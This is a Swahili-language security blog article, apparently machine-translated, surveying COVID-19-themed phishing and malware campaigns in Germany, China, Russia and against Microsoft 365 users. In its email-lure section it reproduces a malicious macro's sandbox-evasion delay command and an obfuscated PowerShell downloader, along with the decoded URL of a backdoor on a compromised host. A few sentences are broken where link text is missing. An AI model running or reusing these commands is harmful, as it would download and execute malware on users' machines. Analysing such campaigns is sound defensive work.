Wavamizi wanaendelea kutumia mada ya COVID-19, na hivyo kusababisha vitisho zaidi na zaidi kwa watumiaji ambao wanavutiwa sana na kila kitu kinachohusiana na janga hili. KATIKA Tayari tumezungumza juu ya aina gani za programu hasidi zilionekana baada ya coronavirus, na leo tutazungumza juu ya mbinu za uhandisi za kijamii ambazo watumiaji katika nchi tofauti, pamoja na Urusi, tayari wamekutana nazo. Mitindo ya jumla na mifano iko chini ya kukata.
Kumbuka katika Tulizungumza juu ya ukweli kwamba watu wako tayari kusoma sio tu juu ya coronavirus na mwendo wa janga, lakini pia juu ya hatua za usaidizi wa kifedha? Hapa kuna mfano mzuri. Shambulio la kuvutia la hadaa liligunduliwa katika jimbo la Ujerumani la North Rhine-Westphalia au NRW. Washambuliaji waliunda nakala za tovuti ya Wizara ya Uchumi (), ambapo mtu yeyote anaweza kutuma maombi ya usaidizi wa kifedha. Programu kama hiyo kweli ipo, na ikawa ya manufaa kwa walaghai. Baada ya kupokea data ya kibinafsi ya waathiriwa wao, walituma maombi kwenye tovuti ya wizara halisi, lakini walionyesha maelezo mengine ya benki. Kulingana na data rasmi, maombi elfu 4 kama hayo yalifanywa hadi mpango huo ulipogunduliwa. Kama matokeo, dola milioni 109 zilizokusudiwa kwa raia walioathiriwa ziliangukia mikononi mwa walaghai.
Je, ungependa kupima COVID-19 bila malipo?
Mfano mwingine muhimu wa ulaghai unaozingatia virusi vya corona ulikuwa katika barua pepe. Ujumbe huo ulivutia umakini wa watumiaji kwa ofa ya kufanyiwa majaribio ya bila malipo ya maambukizi ya virusi vya corona. Katika viambatisho vya haya kulikuwa na matukio ya Trickbot/Qakbot/Qbot. Na wale wanaotaka kuangalia afya zao walipoanza "kujaza fomu iliyoambatanishwa," hati mbaya ilipakuliwa kwenye kompyuta. Na ili kuepuka kupima sandbox, script ilianza kupakua virusi kuu tu baada ya muda fulani, wakati mifumo ya ulinzi ilikuwa na hakika kwamba hakuna shughuli mbaya itatokea.
Kushawishi watumiaji wengi kuwezesha macros pia ilikuwa rahisi. Ili kufanya hivyo, hila ya kawaida ilitumiwa: kujaza dodoso, kwanza unahitaji kuwezesha macros, ambayo ina maana unahitaji kuendesha hati ya VBA.
Kama unaweza kuona, hati ya VBA imefunikwa haswa kutoka kwa antivirus.
Windows ina kipengele cha kusubiri ambapo programu husubiri /T <seconds> kabla ya kukubali jibu chaguo-msingi la "Ndiyo". Kwa upande wetu, hati ilisubiri sekunde 65 kabla ya kufuta faili za muda:
cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt
Na wakati wa kusubiri, programu hasidi ilipakuliwa. Hati maalum ya PowerShell ilizinduliwa kwa hili:
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt
Baada ya kusimbua thamani ya Base64, hati ya PowerShell inapakua mlango wa nyuma ulio kwenye seva ya wavuti iliyodukuliwa hapo awali kutoka Ujerumani:
http://automatischer-staubsauger.com/feature/777777.pngna kuihifadhi chini ya jina:
C:UsersPublictmpdirfile1.exe
Folder ‘C:UsersPublictmpdir’ inafutwa wakati wa kuendesha faili ya 'tmps1.bat' iliyo na amri cmd /c mkdir ""C:UsersPublictmpdir"".
Shambulio lililolengwa kwa mashirika ya serikali
Kwa kuongezea, wachambuzi wa FireEye hivi karibuni waliripoti shambulio lililolengwa la APT32 lililolenga miundo ya serikali huko Wuhan, na vile vile Wizara ya Usimamizi wa Dharura ya Uchina. Mojawapo ya RTF zilizosambazwa ilikuwa na kiungo cha makala ya New York Times yenye kichwa . Walakini, baada ya kuisoma, programu hasidi ilipakuliwa (wachambuzi wa FireEye waligundua mfano kama METALJACK).
Inafurahisha, wakati wa kugundua, hakuna antivirusi iliyogundua tukio hili, kulingana na Virustotal.
Wakati tovuti rasmi ziko chini
Mfano wa kuvutia zaidi wa shambulio la hadaa lilitokea nchini Urusi siku moja tu. Sababu ya hii ilikuwa uteuzi wa faida iliyosubiriwa kwa muda mrefu kwa watoto wenye umri wa miaka 3 hadi 16. Mwanzo wa kukubali maombi ulipotangazwa Mei 12, 2020, mamilioni ya watu walikimbilia tovuti ya Huduma za Serikali kwa usaidizi uliosubiriwa kwa muda mrefu na kuleta tovuti mbaya zaidi kuliko shambulio la kitaalamu la DDoS. Rais aliposema kwamba “Huduma za Serikali hazingeweza kukabiliana na mtiririko wa maombi,” watu walianza kuzungumza mtandaoni kuhusu kuzinduliwa kwa tovuti mbadala ya kupokea maombi.
Shida ni kwamba tovuti kadhaa zilianza kufanya kazi mara moja, na wakati moja, ile halisi kwenye posobie16.gosuslugi.ru, inakubali maombi, zaidi. .
Wenzake kutoka SearchInform walipata takriban vikoa 30 vipya vya ulaghai katika eneo la .ru. Infosecurity na Kampuni ya Softline imefuatilia zaidi ya tovuti 70 sawa za huduma za serikali ghushi tangu mwanzoni mwa Aprili. Waundaji wao hudanganya alama zinazojulikana na pia hutumia michanganyiko ya maneno gosuslugi, gosuslugi-16, vyplaty, covid-vyplaty, posobie, na kadhalika.
Hype na uhandisi wa kijamii
Mifano hii yote inathibitisha tu kwamba wavamizi wanachuma mapato kwa mada ya coronavirus. Na kadiri mvutano wa kijamii unavyoongezeka na jinsi masuala yasiyoeleweka zaidi, ndivyo walaghai wanavyokuwa na nafasi nyingi zaidi za kuiba data muhimu, kuwalazimisha watu kutoa pesa zao wenyewe, au kudukua kompyuta nyingi zaidi.
Na kwa kuzingatia kwamba janga hili limelazimisha watu ambao hawajajiandaa kufanya kazi kutoka nyumbani kwa wingi, sio tu ya kibinafsi, lakini pia data ya kampuni iko hatarini. Kwa mfano, hivi majuzi watumiaji wa Microsoft 365 (zamani Office 365) pia walikumbwa na shambulio la hadaa. Watu walipokea ujumbe mkubwa wa sauti "waliokosa" kama viambatisho kwa barua. Walakini, faili hizo zilikuwa ukurasa wa HTML ambao ulituma wahasiriwa wa shambulio hilo . Matokeo yake, kupoteza ufikiaji na maelewano ya data zote kutoka kwa akaunti.
Chanzo: mapenzi.com